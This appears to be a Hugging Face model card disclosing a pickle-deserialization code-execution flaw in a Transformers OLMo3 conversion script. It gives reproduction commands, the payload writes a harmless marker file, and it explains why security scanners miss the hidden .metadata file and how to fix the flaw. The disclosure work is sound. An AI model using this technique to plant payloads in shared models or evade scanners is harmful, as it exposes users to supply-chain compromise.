⚠️ SECURITY RESEARCH - MALICIOUS MODEL POC

🚨 WARNING: DO NOT USE IN PRODUCTION

This is a proof-of-concept malicious model created for responsible security disclosure.

Purpose: Demonstrate arbitrary code execution vulnerability in Hugging Face Transformers
Program: Huntr Bug Bounty (MFV - Model File Vulnerabilities)
Severity: CRITICAL (CVSS 9.6)
Status: Responsibly disclosed


Vulnerability Details

Summary

This model contains a weaponized .metadata pickle file that executes arbitrary code when loaded by the transformers library's OLMo3 conversion script without any user warning or TRUST_REMOTE_CODE validation.

Affected Code

File: src/transformers/models/olmo3/convert_olmo3_weights_to_hf.py
Lines: 259-260

with (Path(model_path) / ".metadata").open("rb") as metadata_file:
    metadata = pickle.load(metadata_file)  # ❌ UNSAFE - No validation!
    keys = [key for key in metadata.state_dict_metadata.keys() if key.startswith("model.")]

Proof of Exploitation

When this model is converted using the official conversion script:

python src/transformers/models/olmo3/convert_olmo3_weights_to_hf.py \
    --model-path ./malicious_olmo3_poc \
    --output-dir ./converted

What happens:

  1. βœ… Conversion script loads .metadata using pickle.load()
  2. βœ… Pickle exploit triggers via Python's __reduce__ magic method
  3. βœ… Arbitrary code executes (creates /tmp/huntr_poc_exploited.txt)
  4. βœ… NO WARNING shown to user
  5. βœ… NO TRUST_REMOTE_CODE check required

Result: Full arbitrary code execution with process privileges.

Security Impact

CVSS Score: 9.6 (Critical)
Attack Vector: Network (AV:N)
Attack Complexity: Low (AC:L)
Privileges Required: None (PR:N)
User Interaction: Required (UI:R)
Scope: Changed (S:C)
Confidentiality: High (C:H)
Integrity: High (I:H)
Availability: High (A:H)

Impact:

  • πŸ”΄ Arbitrary code execution at model load time
  • πŸ”΄ Full system compromise
  • πŸ”΄ Data exfiltration (SSH keys, credentials, API tokens)
  • πŸ”΄ Persistent backdoor installation
  • πŸ”΄ Supply chain attack vector

ProtectAI Scanner Bypass

This vulnerability bypasses HuggingFace's ProtectAI security scanner because:

  1. βœ— Scanner focuses on .pkl weight files, not .metadata files
  2. βœ— Hidden file (starts with .) often ignored by scanners
  3. βœ— Loaded by conversion scripts, not main model loading paths
  4. βœ— No file extension indicating pickle format
  5. βœ— No TRUST_REMOTE_CODE validation in this code path

Result: Malicious model can be uploaded to HuggingFace Hub and bypass automated security checks.


Responsible Disclosure

Disclosure Timeline

  • Discovery Date: October 6, 2025
  • Disclosure Platform: Huntr (https://huntr.com)
  • Program: Model File Vulnerabilities (MFV)
  • Status: Reported to maintainers
  • CVE: Pending assignment

Affected Versions

  • βœ— Hugging Face Transformers: All versions with OLMo3 support
  • βœ— Affected Models: OLMo3 checkpoints requiring conversion

Remediation

Immediate Fix:

# BEFORE (UNSAFE):
with (Path(model_path) / ".metadata").open("rb") as metadata_file:
    metadata = pickle.load(metadata_file)

# AFTER (SAFE):
import json
with (Path(model_path) / ".metadata.json").open("r") as metadata_file:
    metadata = json.load(metadata_file)  # Safe - no code execution

Long-term Fix:

  1. Migrate all metadata to JSON format
  2. Deprecate pickle for model metadata
  3. Add TRUST_REMOTE_CODE checks if pickle is necessary
  4. Update ProtectAI scanner to detect .metadata files

Usage Instructions (For Security Researchers)

Testing the Vulnerability

# 1. Clone transformers repository
git clone https://github.com/huggingface/transformers.git
cd transformers

# 2. Clone this PoC model
git lfs install
git clone https://huggingface.co/<USERNAME>/malicious-olmo3-poc

# 3. Run conversion script (triggers exploit)
python src/transformers/models/olmo3/convert_olmo3_weights_to_hf.py \
    --model-path ./malicious-olmo3-poc \
    --output-dir ./converted

# 4. Verify exploitation
cat /tmp/huntr_poc_exploited.txt
# Expected output: "VULNERABILITY EXPLOITED - Arbitrary code executed via pickle deserialization"

What This Proves

βœ… Arbitrary code execution during model loading
βœ… No user warning or consent required
βœ… Bypasses security scanning
βœ… Affects real-world usage scenarios


Ethical Guidelines

βœ… ALLOWED:

  • Security research and testing in isolated environments
  • Responsible disclosure through official channels
  • Educational use to understand vulnerabilities
  • Contributing fixes to open source projects

❌ PROHIBITED:

  • Using this model in production environments
  • Distributing without security context
  • Executing on shared or production systems
  • Using for malicious purposes
  • Weaponizing with harmful payloads

Contact

Security Researcher: [Your Name/Handle]
Disclosure Platform: Huntr (https://huntr.com)
Project: Hugging Face Transformers
Maintainer Contact: security@huggingface.co


Acknowledgments

  • Hugging Face team for Transformers library
  • ProtectAI for security scanning infrastructure
  • Huntr platform for responsible disclosure process

This model is for security research and responsible disclosure only.
Use in accordance with applicable laws and ethical guidelines.

License

This PoC is provided for security research under responsible disclosure principles. The Transformers library is licensed under Apache 2.0.

Downloads last month
3
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support